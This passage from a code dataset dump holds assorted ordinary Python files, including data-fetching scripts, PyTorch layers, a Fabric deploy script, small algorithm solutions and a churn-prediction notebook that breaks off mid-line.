candles.\n date = candle.get('time')[:common.DATE_LENGTH]\n date_obj = datetime.datetime.strptime(date, '%Y-%m-%d')\n\n # The day needs to be Sunday - Thursday.\n if date_obj.weekday() in [6, 0, 1, 2, 3]:\n row = [date] + [candle.get(field) \\\n for field in common.CANDLE_FEATURES[1:]]\n writer.writerow(row)\n\n return\n\n\ndef import_daily_candles():\n \"\"\" Fetch daily candles from common.START_DATE to date\n for all currency pairs.\n\n Args:\n void.\n\n Returns:\n void.\n \"\"\"\n for instrument in common.ALL_PAIRS:\n # Set up the output files.\n out_file_path = \"{0}/{1}.csv\".format(common.DAILY_CANDLES, instrument)\n start_date = common.START_DATE\n end_date = str(datetime.date.today() - datetime.timedelta(1))\n\n # Get the candles and write to file.\n candles = get_daily_candles(instrument, start_date, end_date)\n write_candles_to_csv(candles, out_file_path)\n\n return\n\n\ndef main():\n \"\"\" Main in data component.\n 1. Fetch daily candles from common.START_DATE to date\n for all currency pairs in common.ALL_PAIRS.\n \"\"\"\n import_daily_candles()\n\n return\n\n\n# Main.\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"malt/data/rates.py","file_name":"rates.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592196068","text":"\n# This script downloads the observations from USGS aggreages\n# to weekly and saves as a csv\n\n# Potential additions:\n# Make this a function\n\n# Modify so it reads in the previous observation file\n# and only adds in the new obs\n\n# Have this automatically check what day it is\n# and figure out what weeks are complete\n# rather than requiring a week nummber input\n\n# %%\nimport pandas as pd\nimport numpy as np\nimport os\nimport dataretrieval.nwis as nwis\n\n\n# %%\n# User settings\n# refer to Seasonal_Forecast_Dates.pdf for the\n# list of dates associated with each forecast week\n# you should set forecast_week equal to the forecast\n# week that just completed\nweek = int(input('What forecast week is it? (1-16): ')) # Week 12, 11/13, Quinn and Ben\nstation_id = \"09506000\"\n\n# %%\n# read in the forecast data and setup a dataframe\n# filepath = os.path.join('..', 'Seasonal_Foercast_Dates.csv')\nfilepath = os.path.join('../weekly_results',\n 'weekly_observations.csv')\nprint(filepath)\nobs_table = pd.read_csv(filepath, index_col='forecast_week')\n\n\n# %%\n# Read in the observations and get weekly averages\nfor i in range(1, week+1):\n print(i)\n starti = obs_table.loc[i, 'start_date']\n endi = obs_table.loc[i, 'end_date']\n\n # read in the data from USGS\n # Read in the streamflow data and get the weekly average\n obs_day = nwis.get_record(sites=station_id, service='dv',\n start=starti, end=endi, parameterCd='00060')\n obs_table.loc[i, 'observed'] = np.round(np.mean(obs_day['00060_Mean']), 3)\n\n\n# %%\n# Write the updated observations out\nfilepath_out = os.path.join('..', 'weekly_results', 'weekly_observations.csv')\nobs_table.to_csv(filepath_out, index_label='forecast_week')\n\n# %%\n","sub_path":"evaluation_scripts/Get_Observations.py","file_name":"Get_Observations.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"481902009","text":"from flask import Flask, render_template\nfrom flask_bootstrap import Bootstrap\n\nimport redis\n\napp = Flask(__name__)\nBootstrap(app)\n\n@app.route(\"/\")\ndef index():\n \n alerts = {}\n try:\n conn = redis.StrictRedis(host=\"redis\", port=6379)\n \n for key in conn.scan_iter():\n alerts[key] = conn.get(key)\n\n except Exception as ex:\n print(ex)\n\n return render_template(\"index.html\", alerts=alerts)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\")","sub_path":"web-logs/web-logs.py","file_name":"web-logs.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388230384","text":"#!/usr/bin/env python3\n# coding=utf-8\n\n# 求素数\n\n# def _odd_iter():\n# n = 1\n# while True:\n# n = n + 2\n# yield n\n#\n#\n# def _not_divisible(n):\n# return lambda x: x % n > 0\n#\n#\n# def primes():\n# yield 2\n# it = _odd_iter()\n# while True:\n# n = next(it)\n# yield n\n# it = filter(_not_divisible(n),it)\n#\n# for n in primes():\n# if n < 1000:\n# print(n)\n# else:\n# break\n\n# re.sub() 替换\nimport re\n\ns = 'hello 123 haha 456'\nt = re.sub(r'\\d+','cacaca',s,2)\nprint(t)","sub_path":"utils/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435255187","text":"import sys\nimport numpy as np\nfrom skimage.io import imread\n\nTHRESHOLD = 0.5\n\ndef get_bin_image(filename):\n image = imread(filename, as_grey=True)\n assert 0 <= np.min(image) <= 1\n image = image > THRESHOLD\n return image\n\n\ndef crop_center(image, shape):\n assert(len(shape) == 2)\n for i in range(2):\n assert(image.shape[i] >= shape[i])\n\n offset_i = (image.shape[0] - shape[0]) // 2\n offset_j = (image.shape[1] - shape[1]) // 2\n return image[offset_i:offset_i + shape[0],\n offset_j:offset_j + shape[1]]\n\n\ndef iou(filename1, filename2):\n image1, image2 = map(get_bin_image, (filename1, filename2))\n print(image1.shape)\n print(image2.shape)\n if image2.shape[0] > image1.shape[0]:\n image1, image2 = image2, image1\n image1 = crop_center(image1, image2.shape)\n print(np.count_nonzero(image1 & image2) * 1.\\\n / np.count_nonzero(image1 | image2))\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Pass 2 filenames.')\n exit(0)\n print(iou(sys.argv[1], sys.argv[2]))\n","sub_path":"utils/calc_iou.py","file_name":"calc_iou.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"18508691","text":"# Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:\r\n#\n#\n# \tIntegers in each row are sorted from left to right.\r\n# \tThe first integer of each row is greater than the last integer of the previous row.\r\n#\n#\n# Example 1:\r\n#\n#\n# Input:\r\n# matrix = [\r\n# [1, 3, 5, 7],\r\n# [10, 11, 16, 20],\r\n# [23, 30, 34, 50]\r\n# ]\r\n# target = 3\r\n# Output: true\r\n#\n#\n# Example 2:\r\n#\n#\n# Input:\r\n# matrix = [\r\n# [1, 3, 5, 7],\r\n# [10, 11, 16, 20],\r\n# [23, 30, 34, 50]\r\n# ]\r\n# target = 13\r\n# Output: false\r\n#\n\n\nclass Solution:\n def searchMatrix(self, matrix: 'List[List[int]]', target: 'int') -> 'bool':\n if not matrix:\n return False\n m, n = len(matrix), len(matrix[0])\n i = 0\n j = 0\n while i < m and j < n:\n if matrix[i][j] == target:\n return True\n if matrix[i][j] > target:\n break\n if i + 1 < m and matrix[i + 1][j] <= target:\n i += 1\n else:\n j += 1\n return False\n","sub_path":"074-search-a-2d-matrix/search-a-2d-matrix.py","file_name":"search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"352230167","text":"# Copyright 2021 Xuechen Liu\n# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)\n\nimport numpy as np\nimport os\nimport sys\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom attention import AttentionAlphaComponent\n\ndef get_nonlinearity(nonlinearity):\n if nonlinearity == 'relu':\n return F.relu\n elif nonlinearity == 'selu':\n return F.selu\n elif nonlinearity == 'tanh':\n return F.tanh\n else:\n sys.exit(\"nonlinearity must be relu|selu|tanh\")\n\n\ndef get_stats_pooling(pooling):\n if pooling == \"sp\":\n return MeanStdPoolingLayer()\n elif pooling == \"asp\":\n return AttentiveStdPoolingLayer()\n else:\n sys.exit(\"pooling must be sp|asp\")\n\n\nclass TdnnLayer(nn.Module):\n def __init__(\n self,\n dim_in,\n dim_out,\n filter_reach,\n bn_momentum=0.9,\n nonlinearity=\"relu\",\n ):\n super().__init__()\n self.batchnorm = nn.BatchNorm1d(dim_out, momemtum=bn_momentum, affine=True)\n self.nonlinearity = get_nonlinearity(nonlinearity)\n self.tdnn = nn.Conv1d(dim_in, dim_out, filter_reach*2+1,\n padding=filter_reach, padding_mode='zeros')\n \n def forward(self, x):\n x = self.tdnn(x)\n x = self.nonlinearity(x)\n x = self.batchnorm(x)\n return x\n\n\nclass ResTdnnLayer(nn.Module):\n def __init__(\n self,\n dim,\n filter_reach,\n bn_momentum=0.9,\n nonlinearity=\"relu\",\n ):\n super().__init__()\n self.linear = nn.Conv1d(dim, dim, 1, bias=True, padding=0)\n self.conv = nn.Conv1d(dim, dim, filter_reach*2+1, padding=filter_reach, padding_mode='zeros')\n self.linear_norm = nn.BatchNorm1d(dim, momentum=bn_momentum, affine=True)\n self.conv_norm = nn.BatchNorm1d(dim, momentum=bn_momentum, affine=True)\n \n self.nonlinearity = get_nonlinearity(nonlinearity)\n \n def forward(self, x):\n y = self.linear(x)\n y = self.nonlinearity(y)\n y = self.linear_norm(y)\n \n y = self.conv(y)\n x = self.nonlinearity(y+x)\n x = self.conv_norm(x)\n return x\n\n\nclass FcLayer(nn.Module):\n def __init__(\n self,\n dim_in,\n dim_out,\n bn_momentum=0.9,\n nonlinearity=\"relu\",\n ):\n super().__init__()\n self.batchnorm = nn.BatchNorm1d(dim_out, momemtum=bn_momentum, affine=True)\n self.nonlinearity = get_nonlinearity(nonlinearity)\n self.linear = nn.Linear(dim_in, dim_out)\n \n def forward(self, x):\n x = self.linear(x)\n x = self.nonlinearity(x)\n x = self.batchnorm(x)\n return x\n\n\nclass MeanStdPoolingLayer(nn.Module):\n def __init__(self):\n super(MeanStdPoolingLayer).__init__()\n \n def forward(self, x):\n m = torch.mean(x, dim=2)\n sigma = torch.sqrt(torch.clamp(torch.mean(x ** 2, dim=2) - m ** 2, min=1e-6))\n return torch.cat((m, sigma), 1)\n\n\nclass AttentiveStdPoolingLayer(nn.Module):\n def __init__(\n self, \n input_dim, \n num_attn_layers=2,\n stddev=True,\n stddev_attn=True,\n eps=1e-10,\n ):\n super().__init__()\n \n self.stddev = stddev\n self.stddev_attn = stddev_attn\n self.eps = eps\n \n self.attention = AttentionAlphaComponent(input_dim, affine_layers=num_atten_layers)\n \n def forward(self, x):\n alpha = self.attention(x)\n \n mean = torch.sum(alpha * x, dim=2, keepdim=True)\n if self.stddev :\n if self.stddev_attention:\n var = torch.sum(alpha * x**2, dim=2, keepdim=True) - mean**2\n std = torch.sqrt(var.clamp(min=self.eps))\n else:\n var = torch.mean((x - mean)**2, dim=2, keepdim=True)\n std = torch.sqrt(var.clamp(min=self.eps))\n return torch.cat((mean, std), dim=1)\n else :\n return mean\n\n\nclass SoftmaxLossLayer(nn.Module):\n def __init__(\n self,\n input_dim,\n num_targets,\n norm='mean',\n ):\n super().__init__()\n self.linear = FcLayer(input_dim, num_targets)\n self.loss = nn.CrossEntropyLoss(reduction=norm)\n \n def forward(self, x, y):\n posterior = self.linear(x) \n outputs = posterior.squeeze(axis=2)\n this_loss = self.loss(outputs, y)\n return this_loss","sub_path":"espnet2/sid/extractor/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"629845679","text":"# -*- mode: python -*-\na = Analysis(['planet-wars.py'],\n pathex=['/Users/freemanlatif/Documents/Masters/G54PRG/game'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='Planet Wars',\n debug=False,\n strip=None,\n upx=True,\n console=False )\n\n\nsound_tree = Tree('sound', prefix = 'sound')\nimg_tree = Tree('img', prefix = 'img')\nfont_tree = Tree('font', prefix = 'font')\ncoll = COLLECT(exe,\n a.binaries,\n sound_tree,\n img_tree,\n font_tree,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='Planet Wars')\n","sub_path":"planet-wars.spec","file_name":"planet-wars.spec","file_ext":"spec","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"127814576","text":"#!/usr/bin/python3\n\"\"\"usmanjabbar.com\"\"\"\nfrom fabric.api import env, run, put\nweb01, web02 = '35.196.94.233', '54.160.230.10'\nenv.hosts = [web01, web02]\n\n\ndef do_deploy(archive_path):\n \"\"\"\n -----------------\n METHOD: DO_DEPLOY\n -----------------\n DESCRIPTION:\n This method distributes and\n deploys an archive of web_static\n files\n ARGS:\n - Takes in a string with the path\n to the archive file\n NOTES:\n - If the archive_path doesn't exist,\n returns False\n \"\"\"\n from os.path import isfile\n\n # Check if that file actually exists\n if not isfile(archive_path):\n return False\n\n try:\n # Extract the file name from the var 'archive_path'\n archive = archive_path.split('/')[-1]\n\n # Upload, uncompress and delete the archive from the web servers\n put(archive_path, '/tmp/')\n out = '/data/web_static/releases/{}/'.format(archive.split('.')[0])\n run('mkdir -p {}'.format(out))\n run('tar -xzf /tmp/{} -C {}'.format(archive, out))\n run('rm -rf /tmp/{}'.format(archive))\n run('mv {}* {}'.format(out + 'web_static/', out))\n run('rm -rf {}'.format(out + 'web_static/'))\n\n # Del symbolic link 'current' and link extracted folder to current\n run('rm -rf /data/web_static/current')\n run('ln -s {} /data/web_static/current'.format(out))\n\n # All good, return True\n print('New version deployed!')\n return True\n\n except:\n return False\n","sub_path":"2-do_deploy_web_static.py","file_name":"2-do_deploy_web_static.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"453860103","text":"#!/usr/bin/env python3\n\n# Core python modules\nimport sys, os\n\n# Peripheral python modules\nimport argparse\nimport logging\n\n# python external libraries\nimport numpy as np\nimport pandas as pd\n\n# list of classes and methods we'd like to export:\n__all__ = [ \"merge_prize_files\", \"merge_prize_dataframes\" ]\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nhandler.setFormatter(logging.Formatter('%(asctime)s - Prizes: %(levelname)s - %(message)s', \"%I:%M:%S\"))\nlogger.addHandler(handler)\n\n\nparser = argparse.ArgumentParser(description=\"\"\"\n Create one prize file as expected by graph.py from multiple user input data types\"\"\")\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self,parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\ndef directory(dirname):\n if not os.path.isdir(dirname): raise argparse.ArgumentTypeError(dirname + \" is not a directory\")\n else: return dirname\n\nparser.add_argument(\"-o\" \"--out\", dest=\"output_file\", type=argparse.FileType('w'), required=True,\n help='Name of the output prize file with node attributes as columns, as expected by graph.py')\n\nparser.add_argument(\"-p\", \"--proteins\", dest='protein_file', type=argparse.FileType('r'), required=False,\n help='Proteomic data file with two tab-spaced columns: GeneSymbol\\tprize')\n\nparser.add_argument(\"-g\", \"--garnet\", dest='garnet_file', type=argparse.FileType('r'), required=False,\n help='Output file from Garnet, showing relevant TFs')\n\nparser.add_argument(\"-r\", \"--rna\", dest='rna_file', type=argparse.FileType('r'), required=False,\n help='mRNA data file with two tab-spaced columns: GeneSymbol\\tprize. Note that this file will only be used in the visualization, not in the choice of pathways in the protein interaction network. To use mRNA data to assign protein prizes, use Garnet.')\n\nparser.add_argument(\"-m\", \"--metabolites\", dest='metabolite_file', type=argparse.FileType('r'), required=False,\n help='Metabolomics data file with two columns: MetaboliteID\\tlogFC of metabolite. Make sure that your interactome includes metabolite interactions, the default does not.')\n\n\ndef output_dataframe_to_tsv(dataframe, output_file):\n \"\"\"\n Output the dataframe to a csv\n \"\"\"\n dataframe.to_csv(output_file, sep='\\t', header=True, index=False)\n\n\ndef merge_prize_files(prize_files, prize_types):\n \"\"\"\n Arguments:\n prize_files (list of str or FILE): a filepath or FILE object with a tsv of name(\\t)prize(\\t)more...\n prize_types (list of str): a node type name to associate with the nodes from each prize_file\n\n Returns:\n pandas.DataFrame: a DataFrame of prizes with duplicates removed (first entry kept)\n \"\"\"\n\n dataframes = []\n\n for prize_file, prize_type in zip(prize_files, prize_types):\n\n prize_df = pd.read_csv(prize_file, sep='\\t')\n prize_df.columns = ['name', 'prize'] + prize_df.columns[2:].tolist()\n prize_df['type'] = prize_type\n dataframes.append(prize_df)\n\n return merge_prize_dataframes(dataframes)\n\n\ndef merge_prize_dataframes(prize_dataframes):\n \"\"\"\n Arguments:\n prize_dataframes (list of pandas.DataFrame): a list of dataframes, each of which must at least have columns 'name' and 'prize'\n\n Returns:\n pandas.DataFrame: a DataFrame of prizes with duplicates removed (first entry kept)\n \"\"\"\n\n prizes_dataframe = pd.concat(prize_dataframes)\n prizes_dataframe.drop_duplicates(subset=['name'], inplace=True) # Unclear if we should do this?\n\n return prizes_dataframe\n\n\ndef main():\n\n args = parser.parse_args()\n\n prizes_dataframe = merge_prize_files(args.protein_file, args.garnet_file, args.metabolite_file, ['protein', 'garnet', 'metabolites'])\n\n output_dataframe_to_tsv(prizes_dataframe, args.output_file)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/prizes.py","file_name":"prizes.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"109470624","text":"def shell_sort(arr, gaps):\n for gap in gaps:\n for i in range(gap, len(arr)): \n temp = arr[i] \n\n j = i \n while j >= gap and arr[j-gap] > temp: \n arr[j] = arr[j-gap] \n j -= gap \n\n arr[j] = temp \n\n return arr\n","sub_path":"algorithms/shell_sort.py","file_name":"shell_sort.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"268420548","text":"import torch\nimport numpy as np\nfrom torch.autograd import Variable\nfrom torch import nn\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\n\n\ndef inputs(inputs):\n inputs = Variable(torch.Tensor(inputs))\n return inputs\n\ndef targets(targets):\n targets = Variable(torch.Tensor(targets))\n return targets\n\ndef loaddatasets(x_train, y_train, batch_size):\n datasets = TensorDataset(x_train, y_train)\n batch_size = batch_size\n Data = DataLoader(datasets, batch_size, shuffle=True)\n return Data\n\ndef linear_model(x):\n return nn.Linear(3, 2)\n\ndef loss_fn():\n loss_fn = F.mse_loss\n return loss_fn\n\ndef train(Data, num_epoch, model, loss_fn, targets, lr):\n opt = torch.optim.SGD(model.parameters(), lr=lr)\n epochs = num_epoch/5\n for epoch in range(num_epoch):\n for x_train, y_train in Data:\n pred = model(x_train)\n loss = loss_fn(pred, y_train)\n loss.backward()\n opt.step()\n opt.zero_grad()\n \n if (epoch + 1) % epochs == 0:\n print('真实值为:', targets, '\\n预测值为:', pred)\n print('训练次数为[{}/{}]时,误差为:{:.6f}'.format(epoch + 1, num_epoch, loss.item()))\n\ndef predict(x,model):\n x_input = np.array((x), dtype=np.float32)\n x_input = torch.from_numpy(x_input)\n predict = model(x_input)\n print('预测苹果和橘子分别的产量为:',predict.data.numpy())\n\n","sub_path":"水果产量预测/.ipynb_checkpoints/fruit-checkpoint.py","file_name":"fruit-checkpoint.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"158458229","text":"import logging\nimport os\n\nimport pytest\n\nfrom stograde.common import chdir\nfrom stograde.specs.stogradeignore import load_stogradeignore\n\n_dir = os.path.dirname(os.path.realpath(__file__))\n\n\n@pytest.mark.datafiles(os.path.join(_dir, 'fixtures', 'stogradeignore'))\ndef test_load_stogradeignore(datafiles, caplog):\n with caplog.at_level(logging.DEBUG):\n with chdir(str(datafiles)):\n assignments = load_stogradeignore()\n\n log_messages = {(log.msg, log.levelname) for log in caplog.records}\n assert log_messages == {(\"Ignored specs: ['hw1', 'lab23', 'ws4', 'lab5']\", 'DEBUG')}\n\n assert set(assignments) == {'hw1', 'lab5', 'lab23', 'ws4'}\n\n\ndef test_load_stogradeignore_file_not_found(caplog):\n with caplog.at_level(logging.DEBUG):\n assignments = load_stogradeignore()\n\n log_messages = {(log.msg, log.levelname) for log in caplog.records}\n assert log_messages == {('No .stogradeignore file found', 'DEBUG')}\n\n assert isinstance(assignments, list)\n assert not assignments\n","sub_path":"test/specs/test_stogradeignore.py","file_name":"test_stogradeignore.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"48685360","text":"GENERATIONS = 30\nPOPULATION_SIZE = 200\nMAX_DEPTH = 2\nGAME_COUNT = 100\nIS_TOURNAMENT = False\nMUTATION_RATE = 0.1\nCROSSOVER_RATE = 0.65\nELITISM_RATE = 0.05\nTREE_MAX_DEPTH = 10\nTREE_INITIAL_MAX_DEPTH = 3\nELITISM = False\nNUMBERS = 7\n","sub_path":"settings/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"16461186","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0024_auto_20160426_0830'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='CustomPage',\n new_name='CustomPage1',\n ),\n ]\n","sub_path":"content/migrations/0025_auto_20160426_0848.py","file_name":"0025_auto_20160426_0848.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"421162449","text":"\"\"\"\nHeadless CMS Application entry point.\n\"\"\"\nimport sys\nimport shlex\nimport argparse\n\n\nclass Application:\n \"\"\" Main application \"\"\"\n\n def run(self, argv):\n \"\"\" Runs the Headless CMS \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Headless CMS Application\",\n usage=argv[0] + ''' []\n\nstart Starts running as a service.\nconsole Start the interactive console.\nhelp Displays this help message\n\n''')\n parser.add_argument(\"command\", nargs=\"?\", default='console',\n help=\"Command to run.\")\n args = parser.parse_args(argv[1:2])\n\n if not hasattr(args, 'command'):\n command = \"console\"\n else:\n command = args.command\n\n if command == 'help':\n parser.print_help()\n return 0\n\n exec_command = \"_handle_\" + command\n if not hasattr(self, exec_command):\n print(\"Unrecognized command.\")\n parser.print_help()\n return -1\n cmd = getattr(self, exec_command)\n cmd(argv[2:])\n\n return 0\n\n def _handle_start(self, args):\n raise Exception(\"Not implemented yet.\")\n\n def _handle_console(self, args):\n print(\"Console mode activated. Type quit to exit.\")\n while True:\n line = input(\">>\")\n newargs = shlex.split(line)\n newargs.insert(0, '')\n if line == 'quit':\n break\n try:\n self.run(newargs)\n except Exception as e:\n print(e)\n\n\ndef run(argv):\n \"\"\" Runs the Headless CMS \"\"\"\n app = Application()\n app.run(argv)\n\n\nif __name__ == \"__main__\":\n run(sys.argv)\n","sub_path":"cms/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"181310960","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Importing libraries\n\n# In[1]:\n\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os\nimport sys\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport io\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix,accuracy_score,classification_report\nfrom sklearn.metrics import roc_auc_score,roc_curve,scorer\nfrom sklearn.metrics import f1_score\nimport statsmodels.api as sm\nfrom sklearn.metrics import precision_score,recall_score\nfrom xgboost import XGBClassifier\nfrom lightgbm import LGBMClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.feature_selection import RFE\n\n\n# ## Setting Experiment Name\n\n# In[10]:\n\n\nimport mlflow\nimport mlflow.sklearn\n\n# Set the experiment name to an experiment in the shared experiments folder\nmlflow.set_experiment(\"/test_mlflow/3churnPrediction\")\n\n\n# # 1.Data\n\n# In[4]:\n\n\ntelcom = pd.read_csv(r\"WA_Fn-UseC_-Telco-Customer-Churn.csv\")\n#first few rows\ntelcom.head()\n\n\n# # 2. Data Manipulation and Preprocessing\n\n# In[5]:\n\n\n#Data Manipulation\n\n#Replacing spaces with null values in total charges column\ntelcom['TotalCharges'] = telcom[\"TotalCharges\"].replace(\" \",np.nan)\n\n#Dropping null values from total charges column which contain .15% missing data \ntelcom = telcom[telcom[\"TotalCharges\"].notnull()]\ntelcom = telcom.reset_index()[telcom.columns]\n\n#convert to float type\ntelcom[\"TotalCharges\"] = telcom[\"TotalCharges\"].astype(float)\n\n#replace 'No internet service' to No for the following columns\nreplace_cols = [ 'OnlineSecurity', 'OnlineBackup', 'DeviceProtection',\n 'TechSupport','StreamingTV', 'StreamingMovies']\nfor i in replace_cols : \n telcom[i] = telcom[i].replace({'No internet service' : 'No'})\n \n#replace values\ntelcom[\"SeniorCitizen\"] = telcom[\"SeniorCitizen\"].replace({1:\"Yes\",0:\"No\"})\n\n#Tenure to categorical column\ndef tenure_lab(telcom) :\n \n if telcom[\"tenure\"] <= 12 :\n return \"Tenure_0-12\"\n elif (telcom[\"tenure\"] > 12) & (telcom[\"tenure\"] <= 24 ):\n return \"Tenure_12-24\"\n elif (telcom[\"tenure\"] > 24) & (telcom[\"tenure\"] <= 48) :\n return \"Tenure_24-48\"\n elif (telcom[\"tenure\"] > 48) & (telcom[\"tenure\"] <= 60) :\n return \"Tenure_48-60\"\n elif telcom[\"tenure\"] > 60 :\n return \"Tenure_gt_60\"\ntelcom[\"tenure_group\"] = telcom.apply(lambda telcom:tenure_lab(telcom),\n axis = 1)\n\n#Separating churn and non churn customers\nchurn = telcom[telcom[\"Churn\"] == \"Yes\"]\nnot_churn = telcom[telcom[\"Churn\"] == \"No\"]\n\n#Separating catagorical and numerical columns\nId_col = ['customerID']\ntarget_col = [\"Churn\"]\ncat_cols = telcom.nunique()[telcom.nunique() < 6].keys().tolist()\ncat_cols = [x for x in cat_cols if x not in target_col]\nnum_cols = [x for x in telcom.columns if x not in cat_cols + target_col + Id_col]\n\n\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\n\n#customer id col\nId_col = ['customerID']\n#Target columns\ntarget_col = [\"Churn\"]\n#categorical columns\ncat_cols = telcom.nunique()[telcom.nunique() < 6].keys().tolist()\ncat_cols = [x for x in cat_cols if x not in target_col]\n#numerical columns\nnum_cols = [x for x in telcom.columns if x not in cat_cols + target_col + Id_col]\n#Binary columns with 2 values\nbin_cols = telcom.nunique()[telcom.nunique() == 2].keys().tolist()\n#Columns more than 2 values\nmulti_cols = [i for i in cat_cols if i not in bin_cols]\n\n#Label encoding Binary columns\nle = LabelEncoder()\nfor i in bin_cols :\n telcom[i] = le.fit_transform(telcom[i])\n \n#Duplicating columns for multi value columns\ntelcom = pd.get_dummies(data = telcom,columns = multi_cols )\n\n#Scaling Numerical columns\nstd = StandardScaler()\nscaled = std.fit_transform(telcom[num_cols])\nscaled = pd.DataFrame(scaled,columns=num_cols)\n\n#dropping original values merging scaled values for numerical columns\ndf_telcom_og = telcom.copy()\ntelcom = telcom.drop(columns = num_cols,axis = 1)\ntelcom = telcom.merge(scaled,left_index=True,right_index=True,how = \"left\")\n\n\n\n\nfrom imblearn.over_sampling import SMOTE\ncols = [i for i in telcom.columns if i not in Id_col+target_col]\n\nsmote_X = telcom[cols]\nsmote_Y = telcom[target_col]\n\n#Split train and test data\nsmote_train_X,smote_test_X,smote_train_Y,smote_test_Y = train_test_split(smote_X,smote_Y,\n test_size = .25 ,\n random_state = 111)\n\n#oversampling minority class using smote\nos = SMOTE(random_state = 0)\nos_smote_X,os_smote_Y = os.fit_sample(smote_train_X,smote_train_Y)\nos_smote_X = pd.DataFrame(data = os_smote_X,columns=cols)\nos_smote_Y = pd.DataFrame(data = os_smote_Y,columns=target_col)\n\n\n\n\n\n\n\n\n#splitting train and test data \ntrain,test = train_test_split(telcom,test_size = .25 ,random_state = 111)\n \n##seperating dependent and independent variables\ncols = [i for i in telcom.columns if i not in Id_col + target_col]\ntrain_X = train[cols]\ntrain_Y = train[target_col]\ntest_X = test[cols]\ntest_Y = test[target_col]\n\n\n# # 3. Common function for model prediction\n\n# In[6]:\n\n\ndef telecom_churn_prediction(algorithm,training_x,testing_x,training_y,testing_y) :\n \n #model\n algorithm.fit(training_x,training_y)\n predictions = algorithm.predict(testing_x)\n probabilities = algorithm.predict_proba(testing_x)\n \n model_accuracy = accuracy_score(testing_y,predictions)\n print (\"Accuracy Score : \",model_accuracy,\"\\n\")\n model_roc_auc = roc_auc_score(testing_y,predictions) \n print (\"Area under curve : \",model_roc_auc,\"\\n\")\n model_f1_score = f1_score(testing_y,predictions) \n print (\"F1 score: \",model_f1_score,\"\\n\")\n \n return model_accuracy,model_roc_auc,model_f1_score;\n\n\n# # 3.1. Logistic Regression\n\n# # 3.2 XG Boost Model\n\n# # 3.3 Gaussian Naive Bayes\n\n# # 3.4 KNN model\n\n# In[11]:\n\n\n\nwith mlflow.start_run(run_name='KNN'):\n \n \"\"\"ADDITIONAL CODE\"\"\"\n n_neighbors = float(sys.argv[1]) if len(sys.argv) > 20 else 5\n leaf_size = float(sys.argv[2]) if len(sys.argv) > 10 else 8\n \n knn = KNeighborsClassifier(algorithm='auto', 